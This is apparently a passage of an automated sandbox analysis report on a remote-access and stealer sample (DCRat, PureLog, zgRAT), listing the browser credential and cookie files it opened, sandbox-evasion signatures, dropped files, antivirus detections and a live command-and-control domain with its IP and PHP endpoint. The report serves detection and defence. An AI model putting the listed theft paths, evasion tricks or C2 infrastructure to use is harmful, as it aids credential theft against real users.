                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003618000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1",5,1,"","user","238576","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Recovery","NLZUZC3LX (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"2","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.1",5,1,"","user","238576","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Recovery","NLZUZC3LX (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
                              Source: C:\Bridgemonitor\BridgeInto.exeQueries volume information: C:\Bridgemonitor\BridgeInto.exe VolumeInformationJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
                              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
                              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
                              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
                              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
                              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
                              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
                              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm VolumeInformationJump to behavior
                              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeQueries volume information: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe VolumeInformation
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeQueries volume information: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Bridgemonitor\BridgeInto.exeQueries volume information: C:\Bridgemonitor\BridgeInto.exe VolumeInformation
                              Source: C:\Bridgemonitor\BridgeInto.exeQueries volume information: C:\Bridgemonitor\BridgeInto.exe VolumeInformation
                              Source: C:\Recovery\dllhost.exeQueries volume information: C:\Recovery\dllhost.exe VolumeInformation
                              Source: C:\Recovery\dllhost.exeQueries volume information: C:\Recovery\dllhost.exe VolumeInformation
                              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.2341978814.0000000012F28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: BridgeInto.exe PID: 6828, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: EoNanmDGxPEtougVgAjHLx.exe PID: 6244, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: EoNanmDGxPEtougVgAjHLx.exe PID: 6928, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: Fatality.exe, type: SAMPLE
                              Source: Yara matchFile source: 6.0.BridgeInto.exe.840000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000006.00000000.2282375073.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Bridgemonitor\BridgeInto.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\dllhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\ssh\WinStore.App.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: Fatality.exe, type: SAMPLE
                              Source: Yara matchFile source: 6.0.BridgeInto.exe.840000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Bridgemonitor\BridgeInto.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\dllhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\ssh\WinStore.App.exe, type: DROPPED
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.2341978814.0000000012F28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: BridgeInto.exe PID: 6828, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: EoNanmDGxPEtougVgAjHLx.exe PID: 6244, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: EoNanmDGxPEtougVgAjHLx.exe PID: 6928, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: Fatality.exe, type: SAMPLE
                              Source: Yara matchFile source: 6.0.BridgeInto.exe.840000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000006.00000000.2282375073.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Bridgemonitor\BridgeInto.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\dllhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\ssh\WinStore.App.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: Fatality.exe, type: SAMPLE
                              Source: Yara matchFile source: 6.0.BridgeInto.exe.840000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Bridgemonitor\BridgeInto.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\dllhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\ssh\WinStore.App.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information11
                              Scripting                              		Valid Accounts241
                              Windows Management Instrumentation                              		11
                              Scripting                              		1
                              DLL Side-Loading                              		1
                              Disable or Modify Tools                              		1
                              OS Credential Dumping                              		2
                              File and Directory Discovery                              		1
                              Taint Shared Content                              		1
                              Archive Collected Data                              		1
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Scheduled Task/Job                              		1
                              DLL Side-Loading                              		12
                              Process Injection                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory145
                              System Information Discovery                              		Remote Desktop Protocol1
                              Data from Local System                              		2
                              Non-Application Layer Protocol                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              Scheduled Task/Job                              		1
                              Scheduled Task/Job                              		3
                              Obfuscated Files or Information                              		Security Account Manager551
                              Security Software Discovery                              		SMB/Windows Admin Shares1
                              Clipboard Data                              		12
                              Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron21
                              Registry Run Keys / Startup Folder                              		21
                              Registry Run Keys / Startup Folder                              		14
                              Software Packing                              		NTDS2
                              Process Discovery                              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading                              		LSA Secrets471
                              Virtualization/Sandbox Evasion                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              File Deletion                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items33
                              Masquerading                              		DCSync1
                              Remote System Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job471
                              Virtualization/Sandbox Evasion                              		Proc Filesystem1
                              System Network Configuration Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                              Process Injection                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1498676 Sample: Fatality.exe Startdate: 25/08/2024 Architecture: WINDOWS Score: 100 81 373292cm.nyashka.top 2->81 91 Multi AV Scanner detection for domain / URL 2->91 93 Suricata IDS alerts for network traffic 2->93 95 Found malware configuration 2->95 97 16 other signatures 2->97 11 Fatality.exe 3 6 2->11         started        15 EoNanmDGxPEtougVgAjHLx.exe 2->15         started        18 dllhost.exe 2->18         started        20 7 other processes 2->20 signatures3 process4 dnsIp5 61 C:\Bridgemonitor\BridgeInto.exe, PE32 11->61 dropped 63 C:\...\Xaqgc4UniUxink9TEvtSaN4iIb.vbe, data 11->63 dropped 101 Detected unpacking (changes PE section rights) 11->101 103 Tries to detect sandboxes and other dynamic analysis tools (window names) 11->103 105 Hides threads from debuggers 11->105 22 wscript.exe 1 11->22         started        83 373292cm.nyashka.top 80.211.144.156, 49718, 49719, 49722 ARUBA-ASNIT Italy 15->83 65 C:\Users\user\Desktop\vVSvSxGn.log, PE32 15->65 dropped 67 C:\Users\user\Desktop\rfcELAFu.log, PE32 15->67 dropped 69 C:\Users\user\Desktop\UXzikyum.log, PE32 15->69 dropped 71 2 other malicious files 15->71 dropped 107 Multi AV Scanner detection for dropped file 15->107 109 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->109 111 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 15->111 113 Tries to harvest and steal browser information (history, passwords, etc) 15->113 115 Antivirus detection for dropped file 18->115 117 Machine Learning detection for dropped file 18->117 file6 signatures7 process8 signatures9 99 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->99 25 cmd.exe 1 22->25         started        process10 process11 27 BridgeInto.exe 10 34 25->27         started        31 conhost.exe 25->31         started        file12 73 C:\Users\user\Desktop\pMLeDcaM.log, PE32 27->73 dropped 75 C:\Users\user\Desktop\nKZvhtVR.log, PE32 27->75 dropped 77 C:\Users\user\Desktop\XAjYjGFx.log, PE32 27->77 dropped 79 9 other malicious files 27->79 dropped 119 Antivirus detection for dropped file 27->119 121 Multi AV Scanner detection for dropped file 27->121 123 Creates an undocumented autostart registry key 27->123 125 4 other signatures 27->125 33 cmd.exe 27->33         started        36 csc.exe 4 27->36         started        39 csc.exe 4 27->39         started        41 18 other processes 27->41 signatures13 process14 file15 85 Uses ping.exe to sleep 33->85 87 Uses ping.exe to check the status of other devices and networks 33->87 43 conhost.exe 33->43         started        45 chcp.com 33->45         started        47 PING.EXE 33->47         started        57 C:\Program Files (x86)\...\msedge.exe, PE32 36->57 dropped 89 Infects executable files (exe, dll, sys, html) 36->89 49 conhost.exe 36->49         started        51 cvtres.exe 1 36->51         started        59 C:\Windows\...\SecurityHealthSystray.exe, PE32 39->59 dropped 53 conhost.exe 39->53         started        55 cvtres.exe 1 39->55         started        signatures16 process17

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              Fatality.exe79%ReversingLabsWin32.Trojan.DCRat
                              Fatality.exe84%VirustotalBrowse
                              Fatality.exe100%AviraVBS/Runner.VPG
                              Fatality.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\ProgramData\ssh\WinStore.App.exe100%AviraHEUR/AGEN.1323342
                              C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\AppData\Local\Temp\2EcQa8wgx4.bat100%AviraBAT/Delbat.C
                              C:\Users\user\Desktop\XAjYjGFx.log100%AviraHEUR/AGEN.1300079
                              C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\vVSvSxGn.log100%AviraHEUR/AGEN.1300079
                              C:\Bridgemonitor\BridgeInto.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\pMLeDcaM.log100%AviraTR/PSW.Agent.qngqt
                              C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe100%AviraHEUR/AGEN.1323342
                              C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe100%AviraVBS/Runner.VPG
                              C:\Recovery\dllhost.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\LfISQjWH.log100%AviraTR/PSW.Agent.qngqt
                              C:\ProgramData\ssh\WinStore.App.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\EiwsPBui.log100%Joe Sandbox ML
                              C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\UXzikyum.log100%Joe Sandbox ML
                              C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                              C:\Bridgemonitor\BridgeInto.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\pMLeDcaM.log100%Joe Sandbox ML
                              C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe100%Joe Sandbox ML
                              C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                              C:\Recovery\dllhost.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\LfISQjWH.log100%Joe Sandbox ML
                              C:\Bridgemonitor\BridgeInto.exe100%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe100%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe100%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\ProgramData\ssh\WinStore.App.exe100%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe100%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Recovery\dllhost.exe100%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Users\user\Desktop\AqqubUji.log25%ReversingLabs
                              C:\Users\user\Desktop\EiwsPBui.log8%ReversingLabs
                              C:\Users\user\Desktop\LfISQjWH.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\MMFizuKP.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\UXzikyum.log8%ReversingLabs
                              C:\Users\user\Desktop\XAjYjGFx.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\nKZvhtVR.log25%ReversingLabs
                              C:\Users\user\Desktop\pMLeDcaM.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\rfcELAFu.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\vVSvSxGn.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              SourceDetectionScannerLabelLink
                              373292cm.nyashka.top19%VirustotalBrowse

                              URLs

                              SourceDetectionScannerLabelLink
                              https://aefd.nelreports.net/api/report?cat=wsb0%URL Reputationsafe
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                              https://aefd.nelreports.net/api/report?cat=bingaotak0%URL Reputationsafe
                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%URL Reputationsafe
                              https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                              https://www.ecosia.org/newtab/0%URL Reputationsafe
                              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                              https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                              https://aefd.nelreports.net/api/report?cat=bingrms0%URL Reputationsafe
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                              https://www.office.com/0%Avira URL Cloudsafe
                              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                              https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
                              http://www.enigmaprotector.com/openU0%Avira URL Cloudsafe
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                              http://373292cm.nyP20%Avira URL Cloudsafe
                              http://373292cm.nyashka.top100%Avira URL Cloudmalware
                              https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL0%Avira URL Cloudsafe
                              https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
                              http://373292cm.nyashka.top/100%Avira URL Cloudmalware
                              http://373292cm.nyP0%Avira URL Cloudsafe
                              http://www.enigmaprotector.com/0%Avira URL Cloudsafe
                              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&0%Avira URL Cloudsafe
                              http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php100%Avira URL Cloudmalware

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              373292cm.nyashka.top
                              		80.211.144.156
                              		truetrueunknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.phptrue
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/WebCacheV01.dat.8.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/chrome_newtabEoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/ac/?q=EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoEoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://aefd.nelreports.net/api/report?cat=bingthWebCacheV01.dat.8.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.enigmaprotector.com/openUFatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://aefd.nelreports.net/api/report?cat=wsbWebCacheV01.dat.8.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://aefd.nelreports.net/api/report?cat=bingaotakWebCacheV01.dat.8.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgWebCacheV01.dat.8.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://deff.nelreports.net/api/report?cat=msnWebCacheV01.dat.8.dr, V01.log.8.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://373292cm.nyP2EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.ecosia.org/newtab/EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://ac.ecosia.org/autocomplete?q=EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3399676352.0000000013807000.00000004.00000800.00020000.00000000.sdmp, EluSdKNM7k.25.dr, fHEg1gEt1n.25.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELWebCacheV01.dat.8.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://aefd.nelreports.net/api/report?cat=bingaotWebCacheV01.dat.8.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://373292cm.nyashka.topEoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
